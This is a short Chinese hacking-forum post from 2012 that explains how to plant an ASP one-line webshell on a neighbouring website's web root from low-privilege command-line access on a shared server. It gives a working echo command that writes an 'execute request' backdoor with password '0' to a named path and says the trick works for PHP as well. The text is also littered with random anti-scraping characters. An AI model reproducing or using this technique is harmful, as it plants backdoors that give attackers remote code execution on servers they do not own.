中国网络渗透测试联盟

标题: 旁注cmd低权限下拿webshell [打印本页]
作者: admin    时间: 2012-9-23 14:40
标题: 旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
; v4 Y: K! ^; w/ i( r' e% K" H. a) H8 P% Q
命令格式
: c) ]4 @3 f  D$ ~; w+ }8 F4 e8 K  Y+ w- i5 f
Echo 语句 >目标站绝对目录$ N. V! h2 {9 o- Y

2 Y0 H4 K# G  r例如: : i8 n& w) y$ E; N

& t7 e8 l* l9 ~! C/ F+ x+ h3 Hecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp9 I; l7 z$ D5 T: h6 j/ |

* C/ ^! O0 e& T6 E) O; M& ?9 Y这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
- f' ~1 z7 m$ q! l; a



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2